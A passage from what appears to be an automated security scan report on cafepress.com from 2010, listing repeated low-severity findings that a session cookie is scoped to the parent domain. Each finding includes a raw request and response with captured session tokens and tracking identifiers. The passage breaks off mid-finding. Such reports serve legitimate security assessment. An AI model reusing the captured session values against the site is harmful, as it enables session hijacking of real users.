GET /cp/catalogExp/RedirectWithSEOURL.aspx HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 301 Moved Permanently Location: http://www.cafepress.com/ Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW15 Content-Length: 0 Date: Sun, 26 Dec 2010 13:44:56 GMT Connection: close Set-Cookie: cp_ost=; domain=cafepress.com; expires=Sun, 26-Dec-2010 13:45:55 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private
2.42. http://www.cafepress.com/cp/catalogExp/addtocarthelper.aspx
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /cp/catalogExp/addtocarthelper.aspx
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cp/catalogExp/addtocarthelper.aspx HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html; charset=utf-8 Location: http://www.cafepress.com/cp/addtocart.aspx? Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW18 Content-Length: 160 Date: Sun, 26 Dec 2010 13:44:56 GMT Connection: close Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private <html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.cafepress.com/cp/addtocart.aspx?">here</a>.</h2> </body></html>
2.43. http://www.cafepress.com/cp/info/about/
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /cp/info/about/
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cp/info/about/ HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 46251 Date: Sun, 26 Dec 2010 13:44:52 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 46251 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]...
2.44. http://www.cafepress.com/cp/info/help/
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /cp/info/help/
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cp/info/help/ HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html; charset=utf-8 Location: http://help.cafepress.com/hc/s-74058960/cmd/kbresource/front_page!PAGETYPE?VisitorProfile=cafepress Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW15 Content-Length: 216 Date: Sun, 26 Dec 2010 13:44:51 GMT Connection: close Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private <html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://help.cafepress.com/hc/s-74058960/cmd/kbresource/front_page!PAGETYPE?VisitorProfile=cafepress">here</a>.</h2>...[SNIP]...
2.45. http://www.cafepress.com/cp/info/help/index.aspx
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /cp/info/help/index.aspx
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cp/info/help/index.aspx HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html; charset=utf-8 Location: http://help.cafepress.com/hc/s-74058960/cmd/kbresource/front_page!PAGETYPE?VisitorProfile=cafepress Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW15 Content-Length: 216 Date: Sun, 26 Dec 2010 13:44:51 GMT Connection: close Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private <html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://help.cafepress.com/hc/s-74058960/cmd/kbresource/front_page!PAGETYPE?VisitorProfile=cafepress">here</a>.</h2>...[SNIP]...
2.46. http://www.cafepress.com/cp/info/sell/index.aspx
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /cp/info/sell/index.aspx
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cp/info/sell/index.aspx?area=learn&page=learn HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; 
__cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW15
Cteonnt-Length: 51638
Date: Sun, 26 Dec 2010 13:44:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 51638

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]...
2.47. http://www.cafepress.com/cp/moredetails.aspx
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/cp/moredetails.aspx
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cp/moredetails.aspx HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 400 Bad Request
Content-Type: text/html
Location: /cp/bing/errorpage.html?aspxerrorpath=/cp/moredetails.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW22
Content-Length: 11
Date: Sun, 26 Dec 2010 13:44:56 GMT
Connection: close
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private

Bad Request
2.48. http://www.cafepress.com/cp/products/
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/cp/products/
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
